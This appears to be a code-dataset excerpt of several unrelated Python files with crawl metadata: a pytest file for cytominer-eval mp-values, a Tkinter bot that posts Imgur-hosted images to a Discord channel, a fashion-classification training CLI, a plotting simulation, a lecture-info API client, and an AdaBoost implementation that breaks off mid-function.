"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.ravel",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 68,
"usage_type": "attribute"
},
{
"api_name": "datetime.timedelta",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "numpy.ravel",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "flask.jsonify",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.min",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 79,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 80,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.strftime",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 83,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 92,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func.min",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 96,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.avg",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 97,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.func.max",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.func",
"line_number": 98,
"usage_type": "name"
},
{
"api_name": "flask.jsonify",
"line_number": 109,
"usage_type": "call"
}
] |
28800553771
|
import os
import pytest
import pathlib
import numpy as np
import pandas as pd
from math import isclose
from cytominer_eval.operations import mp_value
from cytominer_eval.utils.mpvalue_utils import (
calculate_mp_value,
calculate_mahalanobis,
)
# Load CRISPR dataset
example_file = "SQ00014610_normalized_feature_select.csv.gz"
example_file = pathlib.Path(
"{file}/../../example_data/gene/{eg}".format(
file=os.path.dirname(__file__), eg=example_file
)
)
df = pd.read_csv(example_file)
meta_features = [
x for x in df.columns if (x.startswith("Metadata_") or x.startswith("Image_"))
]
features = df.drop(meta_features, axis="columns").columns.tolist()
control_perts = ["Luc-2", "LacZ-2", "LacZ-3"]
replicate_id = "Metadata_pert_name"
def test_calculate_mahalanobis():
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
maha = calculate_mahalanobis(pert_df=sub_df, control_df=control_df)
assert isinstance(maha, float)
# The following value is empirically determined
# and not theoretically justified but avoids unwanted
# changes in the implementation of the Mahalanobis distance
assert isclose(maha, 3.62523778789, abs_tol=1e-09)
maha = calculate_mahalanobis(pert_df=control_df, control_df=control_df)
# Distance to itself should be approximately zero
assert isclose(maha, 0, abs_tol=1e-05)
def test_calculate_mp_value():
# The mp-values are empirical p-values
# so they range from 0 to 1, with low values
# showing a difference to the control condition.
sub_df = df[(df.Metadata_WellRow == "A") & (df.Metadata_pert_name == "EMPTY")][
features
]
control_df = df[df[replicate_id].isin(control_perts)][features]
# Avoid fluctuations in permutations
np.random.seed(2020)
result = calculate_mp_value(pert_df=sub_df, control_df=control_df)
assert isinstance(result, float)
assert result > 0
assert result < 1
# Distance to itself should be approximately zero
# So mp-value should be 1
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"nb_permutations": 2000}
)
assert isclose(result, 1, abs_tol=1e-02)
with pytest.raises(AssertionError) as ae:
result = calculate_mp_value(
pert_df=control_df, control_df=control_df, params={"not_a_parameter": 2000}
)
assert "Unknown parameters provided. Only" in str(ae.value)
def test_mp_value():
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
)
assert "mp_value" in result.columns
assert all(result.mp_value <= 1)
assert all(result.mp_value >= 0)
assert len(np.unique(df[replicate_id])) == len(result)
with pytest.raises(AssertionError) as ae:
result = mp_value(
df=df,
control_perts=control_perts,
replicate_id=replicate_id,
features=features,
params={"not_a_parameter": 2000},
)
assert "Unknown parameters provided. Only" in str(ae.value)
|
cytomining/cytominer-eval
|
cytominer_eval/tests/test_operations/test_mp_value.py
|
test_mp_value.py
|
py
| 3,230 |
python
|
en
|
code
| 7 |
github-code
|
6
|
[
{
"api_name": "pathlib.Path",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mahalanobis",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mahalanobis",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.random.seed",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 66,
"usage_type": "attribute"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "math.isclose",
"line_number": 79,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.utils.mpvalue_utils.calculate_mp_value",
"line_number": 82,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.operations.mp_value",
"line_number": 89,
"usage_type": "call"
},
{
"api_name": "numpy.unique",
"line_number": 99,
"usage_type": "call"
},
{
"api_name": "pytest.raises",
"line_number": 101,
"usage_type": "call"
},
{
"api_name": "cytominer_eval.operations.mp_value",
"line_number": 102,
"usage_type": "call"
}
] |
14235086016
|
from http.client import HTTPSConnection
from tkinter import filedialog as fd
from tkinterdnd2 import *
from threading import *
from tkinter import *
from json import *
from sys import *
from tkinter import ttk
from time import sleep
import tkinter as tk
import pyimgur
import random
import sys
'''
GUIDES I USED
https://www.quora.com/I-want-to-automatically-post-a-message-every-24-hours-on-my-Discord-server-using-my-own-account-not-a-bot-account-Is-this-possible-and-if-so-how # STARTING POINT, REMOTE SENDER
https://www.pythontutorial.net/tkinter/tkinter-open-file-dialog/ # FILE DIALOG
https://pythonguides.com/python-tkinter-drag-and-drop/ # DRAG AND DROP FEATURE FOR MULTIPLE FILES
https://www.tutorialspoint.com/taking-input-from-the-user-in-tkinter # ADDING INPUT ENTRY WIDGETS
https://www.youtube.com/watch?v=lvky-tmoTvg # HOW TO USE IMGUR API, SIMPLE
https://www.delftstack.com/howto/python/python-replace-line-in-file/ # HOW TO REPLACE IMAGE PATHS ON DISK INTO POSTABLE IMGUR LINKS
https://www.geeksforgeeks.org/how-to-use-thread-in-tkinter-python/ # USEFUL EXAMPLE, SIMPLIFICATION OF THREADING
'''
'''↓↓↓↓ PROGRAM DOES NOT WORK WITHOUT!! ↓↓↓↓'''
TOKEN = '' # FOR EX. OTM1MjUzMjI2MjY0MDY4MjM3.Ye7-rA.w3WsZ0DpCr4lKYurKPa_bLUodBQ
IMGUR_ID = '' # FOR EX. 19a12e239az128h
CHANNEL_ID = '' # FOR EX. 123821903821083257
'''↑↑↑↑ FOR PERSONAL USE: ONLY TOUCH THESE 3 SPECIFIERS ABOVE, TOKEN, IMGUR_ID, and CHANNEL_ID ↑↑↑↑'''
'''TOKEN is your discord token, BE CAUTIOUS ABOUT THIS USE. View the program below if you are unsure about it's usage.
IMGUR_ID is the API key that Imgur gives you once you sign up. Or you can use any image uploader service, discord will convert image links to images.
CHANNEL_ID is the ID of the discord channel (enabler developer view, copy ID of the text channel, assuming image perms)
Examples are FAKE/THROWAWAYS, use credible ID.
'''
global temporary_widget # DO NOT TOUCH
class Client:
'''
Draws the GUI responsible for selecting image files to send to a discord channel.
Notably a Drag and drop feature (can use multiple files but dragged one at a time)
or through a file dialog.
'''
def __init__(self):
self.main = TkinterDnD.Tk()
self.main.title('Discord ImageBot')
self.main.geometry('450x650')
self.main.resizable(False, False)
self.main.config(bg='#36393f')
self.send_condition = tk.BooleanVar()
self.send_condition.set(True)
self.stop_condition = tk.BooleanVar()
self.stop_condition.set(True)
self.seconds_btwn_msg = 1 # an hour between sending each image by default
self.seconds_before_stop = 360000
self.image_paths = []
self.temp_widget = Label()
self._draw()
self.main.mainloop()
def _draw(self):
global temporary_widget
widget_text = 'Corbel 10 bold'
# - - - - - - - - - - - - - - - - - - - - -
# Open File System
open_image_files = tk.Button(bg='#7289DA', fg='white', font='Corbel 12 bold', text='Open Image Files',
command=self.select_files)
open_image_files.pack(pady=10)
OR = Label(anchor=CENTER, text='OR', bg='#36393f', fg='white', font=widget_text)
OR.pack()
drag_and_drop = Label(anchor=CENTER, text='Drag & Drop Images', bg='#36393f', fg='white',
font='Corbel 14 bold')
drag_and_drop.pack()
listbox = Listbox(width=45, height=15, bg='#36393f', fg='#FFFFFF', selectmode=EXTENDED)
self.temp_widget = listbox
listbox.pack()
send_dropped_files = tk.Button(bg='#36393f', fg='white', font=widget_text, text='Send Dropped Files',
command=self.threading)
send_dropped_files.pack(pady=10)
listbox.drop_target_register(DND_FILES)
listbox.dnd_bind('<<Drop>>', self.add_to_listbox)
# - - - - - - - - - - - - - - - - - - - - -
# Connection Status bar
frame = Frame(pady=20, padx=20)
frame.config(bg='#36393f')
frame.pack()
separator = ttk.Separator(frame, orient=tk.HORIZONTAL)
separator.grid(row=0, sticky='ew', pady=10, columnspan=10)
# - - - - - - - - - - - - - - - - - - - - -
# Time Interval Section
interval_label = Label(frame, bg='#36393f', fg='white', font=widget_text, text='Time Between Message (min)')
interval_label.grid(row=2, column=0)
time_interval_entry = tk.Entry(frame, bg='#36393f', fg='white', font=widget_text)
temporary_widget = time_interval_entry
time_interval_entry.grid(row=2, column=1, columnspan=4, padx=10)
update_button = tk.Button(frame, bg='#36393f', fg='white', font=widget_text, text='Update', command=self.set_interval)
update_button.grid(row=2, column=5)
# - - - - - - - - - - - - - - - - - - - - -
# Stop Later Section
stop_later_label = Label(frame, bg='#36393f', fg='white', font=widget_text, text='Stop Later (min)')
stop_later_label.grid(row=3, column=0)
stop_later_entry = tk.Entry(frame, bg='#36393f', fg='white', font=widget_text)
# temporary_widget = stop_later_entry # doesnt work when you have multiple global carriers
stop_later_entry.grid(row=3, column=1, columnspan=4, padx=10)
update_button2 = tk.Button(frame, bg='#36393f', fg='white', font=widget_text, text='Update', command=self.later_interval)
update_button2.grid(row=3, column=5)
# - - - - - - - - - - - - - - - - - - - - -
# Stop Button
stop_button = tk.Button(bg='#ce524d', fg='white', font=widget_text, text='Stop Sending', command=self.turn_off_sending)
stop_button.pack()
# - - - - - - - - - - - - - - - - - - - - -
# Quit button
quit_button = tk.Button(bg='#ce524d', fg='white', font=widget_text, text='Quit', command=self.quit)
quit_button.pack(expand=True)
def add_to_listbox(self, event):
event.data = str(event.data).strip("{}[](),'") # get rid of unusual symbols
self.temp_widget.insert('end', event.data) # inserts the event.data to be displayed in the Listbox
self.image_paths.append(event.data)
def select_files(self):
'''
The file dialog. Responsible for opening a file dialog window for the user so that you may select an image
or multiple images to send to a discord channel.
'''
filetypes = (
('Image files', '*.png *.jpg *.jpeg *.tfif, *.tiff *.bmp *.gif *.eps *.raw'),
('All files', '*.*')
)
filepaths = fd.askopenfilenames(
# opens the file dialog, also creates a tuple of the file paths
# specified by options that are keyword arguments
title='Open files',
filetypes=filetypes)
filepaths = list(filepaths)
self.image_paths = filepaths
self.threading()
def write_to_file(self):
'''
Addresses obscure error with dragging 2 files, and then dragging in a previously dragged in file, resulting in an
incorrectly formatted list, and makes sure that each image path gets its own individual line.
'''
ordered_image_paths = []
for image_path in self.image_paths:
elem = image_path.split()
ordered_image_paths += elem
self.image_paths = ordered_image_paths # even if the list was initially correctly ordered,
# it would still be set correctly (nothing changes)
# ensure that one path gets one line
with open('some_images.txt', 'w') as output:
for image in self.image_paths:
output.write(str(image) + '\n')
def turn_off_sending(self):
self.send_condition.set(False)
def send_images(self):
self.write_to_file()
ImgurClient().imgur_convert()
wp = WritePhrase()
print('NEW RUN')
print('-' * 20)
while self.send_condition.get() and self.stop_condition.get():
wp.sender('some_images.txt') # this is the file we make
if self.seconds_btwn_msg == '':
print('why is this true') # this happens when you have multiple objects assigned to the global temporary_widget
self.seconds_btwn_msg = '1'
min = int(self.seconds_btwn_msg) * 60
print('min: ', min)
sleep(min)
def set_interval(self):
if self.temp_widget != '':
global temporary_widget
self.seconds_btwn_msg = temporary_widget.get()
print('min: ', self.seconds_btwn_msg)
def later_interval(self):
if self.temp_widget != '':
global temporary_widget
self.seconds_before_stop = temporary_widget.get()
print(self.seconds_before_stop)
def threading(self):
t1 = Thread(target=self.send_images) # simplest way to use a thread is to instantiate with a target function
t1.start() # and then call start
def threading2(self):
t2 = Thread(target=self.timed_loop)
t2.start()
def timed_loop(self):
min = int(self.seconds_before_stop) * 60
sleep(min)
self.stop_condition.set(False)
def quit(self):
self.turn_off_sending()
self.main.destroy()
sys.exit(-1) # defined in system, sys.exit()
class WritePhrase:
'''
Responsible for actually sending the message, in this case an imgur link to an image, to a specific discord channel.
Given the discord user's token, the host (discordapp.com) and the ID of the discord channel (acts as a link)
'''
def __init__(self):
self.used_phrases = []
@staticmethod
def get_connection():
return HTTPSConnection('discordapp.com') # similar to the smp_conn object we instantiated before
# this HTTPSConnection object can be used to authenticate, read, write and return messages
@staticmethod
# static because its not bound to the object of the class, just sending
def send_message(conn, channel_id, message_data):
"""
request of HTTP takes method, url, body, and headers
Get Channel Messages:
/channels/{channel.id}/messages
:param conn:
:param channel_id:
:param message_data:
:return:
"""
header_data = {
'content-type': 'application/json',
'authorization': TOKEN,
'host': 'discordapp.com',
}
conn.request('POST', f'/api/v9/channels/{channel_id}/messages', message_data, header_data)
resp = conn.getresponse() # called after a request is sent to the server.
# returns an HTTPResponse instance
# you must read responses before sending new requests
if 199 < resp.status < 300:
print(f'Message {message_data} sent')
else:
stderr.write(f'Received HTTP {resp.status}: {resp.reason}\n')
def sender(self, file):
message = self.random_line(file)
message_data = {
'content': message,
'tts': 'false',
}
self.send_message(self.get_connection(), CHANNEL_ID, dumps(message_data))
def random_line(self, file_name) -> str:
new_phrases = open(file_name).readlines() # compute a list of lines WITH all the '\n' characters at the end
if len(self.used_phrases) == len(new_phrases):
self.used_phrases = []
print()
used_phrase = random.choice(new_phrases)
while used_phrase in self.used_phrases:
used_phrase = random.choice(new_phrases)
self.used_phrases.append(used_phrase)
return used_phrase
class ImgurClient:
'''
Client connects with Imgur, replaces the paths of selected images from file dialog or drag and drop and converts them
to discord links so that they may be successfully posted on discord.
'''
@staticmethod
def imgur_convert():
file = open('some_images.txt', 'r')
replacement = ''
for image_path in file:
image_path = image_path.strip() # line must be stripped (removed of whitespaces AND line breaks) or its an invalid argument
im = pyimgur.Imgur(IMGUR_ID) # connect with Imgur
image = im.upload_image(image_path) # upload the image from its path
change = image_path.replace(image_path, image.link) + '\n' # replace the current line (image path)
# with its created imgur link
replacement += change # updating replacement with the change
file.close()
# dividing it into reading then writing avoids confusion and errors
fout = open('some_images.txt', 'w') # resets the file, 'w' creates a new file if file opened already exists
fout.write(replacement) # because the write() method doesn't automatically add \n
fout.close()
if __name__ == '__main__':
Client()
|
vaperyy/ImageBot_for_Discord
|
image_bot.py
|
image_bot.py
|
py
| 13,058 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "tkinter.BooleanVar",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "tkinter.BooleanVar",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 83,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 98,
"usage_type": "call"
},
{
"api_name": "tkinter.ttk.Separator",
"line_number": 111,
"usage_type": "call"
},
{
"api_name": "tkinter.ttk",
"line_number": 111,
"usage_type": "name"
},
{
"api_name": "tkinter.HORIZONTAL",
"line_number": 111,
"usage_type": "attribute"
},
{
"api_name": "tkinter.Entry",
"line_number": 119,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 123,
"usage_type": "call"
},
{
"api_name": "tkinter.Entry",
"line_number": 131,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 135,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 140,
"usage_type": "call"
},
{
"api_name": "tkinter.Button",
"line_number": 145,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog.askopenfilenames",
"line_number": 164,
"usage_type": "call"
},
{
"api_name": "tkinter.filedialog",
"line_number": 164,
"usage_type": "name"
},
{
"api_name": "time.sleep",
"line_number": 215,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 239,
"usage_type": "call"
},
{
"api_name": "sys.exit",
"line_number": 245,
"usage_type": "call"
},
{
"api_name": "http.client.HTTPSConnection",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 310,
"usage_type": "call"
},
{
"api_name": "random.choice",
"line_number": 312,
"usage_type": "call"
},
{
"api_name": "pyimgur.Imgur",
"line_number": 333,
"usage_type": "call"
}
] |
19200731938
|
import argparse
from inference import Inference
from model import FashionModel
from train import Trainer
from data import TrainDataset
class ArgumentSelectError(Exception):
pass
def training():
train_dataset = TrainDataset(
image_dir=args.train_data_dir,
csv_path_train=f'data/dataset_csv/list_combined_{args.train_type}_small_train.tsv',
csv_path_val=f'data/dataset_csv/list_combined_{args.train_type}_small_val.tsv',
train_type=args.train_type,
batch_size=16,
shuffle=True,
random_seed=60,
image_shape=args.input_shape
)
fm = FashionModel()
fm.create_model(num_classes=train_dataset.num_classes, input_shape=[args.input_shape[0], args.input_shape[1], 3])
if args.checkpoint is not None:
fm.model.load_weights(args.checkpoint)
fm.model.summary()
trainer = Trainer(
model=fm.model,
train_gen=train_dataset.train_generator,
val_gen=train_dataset.validation_generator,
epoch=args.epoch,
step=args.step
)
trainer.train(log_dir=args.log_dir)
def inference():
inf = Inference(model_path=f'models/{args.predict_type}.h5',
sample_dir='samples',
inference_type=args.predict_type,
inference_csv=f'data/{args.predict_type}.csv')
inf.predict(save_result=True)
total_types = ['category', 'attribute', 'attribute1', 'attribute2', 'attribute3', 'attribute4', 'attribute5']
parser = argparse.ArgumentParser(
prog='Fashion Category and Attribute Prediction',
add_help=True,
description='This program predicts categories, textures(attribute1),'
'fabrics(attribute2), shapes(attribute3), parts(attribute4),'
'and styles(attribute5).'
)
parser.add_argument('-t', '--train', action='store_true',
help='Trains model with `--train-data-dir` and `--train-data-csv`.')
parser.add_argument('--train-type', type=str,
help='Selects which type will be trained. eg. `category`, `attribute1`.')
parser.add_argument('--train-data-dir', type=str,
help='Locate where is data folder.')
parser.add_argument('--input-shape', type=int, nargs=2,
help='Number of epochs to train.')
parser.add_argument('--epoch', type=int,
help='Number of epochs to train.')
parser.add_argument('--step', type=int,
help='Number of epochs to train.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Number of epochs to train.')
parser.add_argument('--log-dir', type=str,
help='Locate where will training logs will be saved.')
parser.add_argument('-p', '--predict', action='store_true',
help='Inference model with `--sample-folder`.')
parser.add_argument('--predict-type', type=str,
help='Selects which type will be predicted. eg. `category`, `attribute1`.')
if __name__ == '__main__':
args = parser.parse_args()
try:
if args.train:
if args.train_data_dir is None:
raise ArgumentSelectError('Train data directory not specified. Can not train!')
elif args.log_dir is None:
raise ArgumentSelectError('Log directory not specified. Can not train!')
elif not any([args.train_type == train_type for train_type in total_types]):
raise ArgumentSelectError('Train type not specified. Can not train!')
else:
print('Training!')
training()
print('Training Finished!')
elif args.predict:
if not any([args.predict_type == pred_type for pred_type in total_types]):
raise ArgumentSelectError('Predict type not specified. Can not predict.')
else:
print('Inference!')
inference()
print('Inference Completed!')
except ArgumentSelectError as err:
print(err)
print('Please enter right arguments!')
|
omerferhatt/deep-fashion-classification
|
main.py
|
main.py
|
py
| 4,105 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "data.TrainDataset",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "model.FashionModel",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "train.Trainer",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "inference.Inference",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 52,
"usage_type": "call"
}
] |
14624971996
|
#coding:utf-8
from math import e
import numpy as np
year=150
def func(x):
if x<0:
return e**(g*x)
else:
return 1
x_1=[-3/float(40000)*x**2+3/float(200)*x for x in range(1,year)]
x_2=[]
T=3/2*(year-50)
a=1/T**2
for x in range(1,year):
if(x<=T):
x_2.append(a*x**2)
else:
x_2.append(1)
x_3=[1/float(100)*x for x in range(1,year)]
x_5=[]
halfyear=year/2
for x in range(1,year):
if(x<=halfyear):
x_5.append(1/halfyear**2*x*x)
else:
x_5.append(-(x-year)**2/halfyear**2+1)
import matplotlib.pyplot as plt
fig=plt.figure(1)
ax={}
number=0
sigma=0.008
for k in [0.01,0.02,0.03]:
for g in [0.003,0.005,0.008]:
rand=np.random.normal(0,sigma)
c_1 = [0.01]
c_2 = [0.01]
c_3 = [0.01]
c_4 = [0.01]
c_5 = [0.01]
for i in range(1,year):
c_1.append(min(k*(1-x_1[i-1])*(1-c_1[i-1])+func(x_1[i-1]-c_1[i-1])*c_1[i-1]+rand,1))
c_2.append(min(k * (1 - x_2[i-1]) * (1 - c_2[i-1]) + func(x_2[i-1] - c_2[i-1]) * c_2[i-1]+rand,1))
c_3.append(min(k * (1 - x_3[i-1]) * (1 - c_3[i-1]) + func(x_3[i-1] - c_3[i-1]) * c_3[i-1]+rand,1))
c_5.append(min(k * (1 - x_5[i-1]) * (1 - c_5[i-1]) + func(x_5[i-1] - c_5[i-1]) * c_5[i-1]+rand,1))
for i in range(1,year):
c_4.append(min(k * (1 - c_4[i-1]) * (1 - c_4[i-1]) + func(c_4[i-1] - c_4[i-1]) * c_4[i-1]+rand,1))
ax[number]=fig.add_subplot(331+number)
plt.title('k=%.3f,g=%.3f'%(k,g))
plt.plot(c_1,label='quadric')
plt.plot(c_2,label='convex')
plt.plot(c_3,label='static')
plt.plot(c_4,label='dynamic')
plt.plot(c_5,label='logistics')
number=number+1
ax[8].legend(loc='lower center',shadow=True,bbox_to_anchor=(1.2, 1.4),borderaxespad = 0.)
plt.show()
|
liangzp/2018-American-Interdisciplinary-Contest-in-Modeling
|
Code/random_model.py
|
random_model.py
|
py
| 1,910 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "math.e",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 34,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 34,
"usage_type": "name"
},
{
"api_name": "numpy.random.normal",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 40,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot.title",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 61,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 62,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 64,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 64,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 65,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.plot",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 66,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.show",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 70,
"usage_type": "name"
}
] |
5637517912
|
from urllib.request import urlopen
from datetime import datetime
import json
from settings import my_lec_list, base_url
class InfoList(object):
def __init__(self):
self.json = self.get_api()
self.table = self.json["table"]
self.count = self.json["count"]
self.body = self.json["body"]
self.my_list = self.set_my_info()
@staticmethod
def get_api():
api = urlopen(base_url + "info/")
s = api.read().decode('utf-8')
return json.loads(s)
@staticmethod
def identify(subject):
if subject in my_lec_list:
return True
else:
return False
def set_ids(self):
id_list = []
for b in self.body:
judge = self.identify(b["subject"])
if judge:
id_list.append(b["id"])
else:
pass
return id_list
def set_my_info(self):
detail_list = []
for id in self.set_ids():
d = InfoDetail(id)
detail_list.append(d)
return detail_list
class InfoDetail(object):
def __init__(self, info_id):
self.id = info_id
self.json = self.get_api()
self.subject = self.json["subject"]
self.teacher = self.json["teacher"]
self.abstract = self.json["abstract"]
self.detail = self.json["detail"]
self.created_at = self.convert_date(self.json["time"]["created_at"])
self.last_update = self.convert_date(self.json["time"]["last_update"])
self.last_confirm = self.convert_date(self.json["time"]["last_confirm"])
def get_api(self):
api = urlopen(base_url + "info/id/" + str(self.id))
s = api.read().decode('utf-8')
return json.loads(s)
@staticmethod
def convert_date(d):
l = len(d)
if l > 11:
return datetime.strptime(d, "%Y/%m/%d %H:%M:%S")
else:
return datetime.strptime(d, "%Y/%m/%d")
if __name__ == "__main__":
i = InfoList()
for detail in i.my_list:
print(type(detail))
print(detail.subject)
print(detail.created_at.strftime("%Y-%m-%d %H:%M:%S"))
|
pddg/learning
|
models.py
|
models.py
|
py
| 2,174 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "urllib.request.urlopen",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "settings.base_url",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "settings.my_lec_list",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "urllib.request.urlopen",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "settings.base_url",
"line_number": 59,
"usage_type": "name"
},
{
"api_name": "json.loads",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 67,
"usage_type": "name"
},
{
"api_name": "datetime.datetime.strptime",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 69,
"usage_type": "name"
}
] |
72333132669
|
"""
@File : AdaBoost.py
@Time : 2020-05-26
@Author : BobTsang
@Software: PyCharm
@Email : [email protected]
"""
# 这次用的是乳腺癌数据集做的二分类任务,因为鸢尾花数据集太小,特征较少,对于提升树不太cover
# Minst:596x31
# time:62s
import pandas as pd
import numpy as np
from sklearn import datasets
import random
import time
# 手工实现打乱数据,不采用sklearn调用shuffle打乱数据
def Random_number(data_size):
"""
该函数使用shuffle()打乱一个包含从0到数据集大小的整数列表。因此每次运行程序划分不同,导致结果不同
改进:
可使用random设置随机种子,随机一个包含从0到数据集大小的整数列表,保证每次的划分结果相同。
:param data_size: 数据集大小
:return: 返回一个列表
"""
num_set = []
random.seed(1)
for i in range(data_size):
num_set.append(i)
random.shuffle(num_set)
return num_set
def Train_test_split(data_set, target_data, size=0.2):
"""
说明:分割数据集,我这里默认数据集的0.3是测试集
:param data_set: 数据集
:param target_data: 标签数据
:param size: 测试集所占的比率
:return: 返回训练集数据、训练集标签、训练集数据、训练集标签
"""
# 计算训练集的数据个数
train_size = int((1 - size) * len(data_set))
# 获得数据
data_index = Random_number(len(data_set))
# 分割数据集(X表示数据,y表示标签),以返回的index为下标
x_train = data_set[data_index[:train_size]]
x_test = data_set[data_index[train_size:]]
y_train = target_data[data_index[:train_size]]
y_test = target_data[data_index[train_size:]]
return x_train, x_test, y_train, y_test
def Caculation_error_Gx(x_train, y_train, n, div, rule, D):
"""
计算分类错误率
:param x_train:训练集数据
:param y_trian:训练集标签
:param n:要操作的特征
:param div:划分点(阈值)
:param rule:正反例标签
:param D:权值分布
:return:预测结果,分类误差
"""
# 初始化分类误差率为0
error = 0
# 将训练数据矩阵中特征为n的那一列单独剥出来做成数组。因为其他元素我们并不需要,
# 直接对庞大的训练集进行操作的话会很慢
x = x_train[:, n]
# 同样将标签也转换成数组格式,x和y的转换只是单纯为了提高运行速度
# 测试过相对直接操作而言性能提升很大
y = y_train
predict = []
# 依据小于和大于的标签依据实际情况会不同,在这里直接进行设置
if rule == 'LisOne': L = 1; H = -1
else: L = -1; H = 1
# 遍历所有样本的特征m
for i in range(x_train.shape[0]):
if x[i] < div:
# 如果小于划分点,则预测为L
# 如果设置小于div为1,那么L就是1,
# 如果设置小于div为-1,L就是-1
predict.append(L)
# 如果预测错误,分类错误率要加上该分错的样本的权值(8.1式)
if y[i] != L:
error += D[i]
elif x[i] >= div:
# 与上面思想一样
predict.append(H)
if y[i] != H:
error += D[i]
# 返回预测结果和分类错误率e
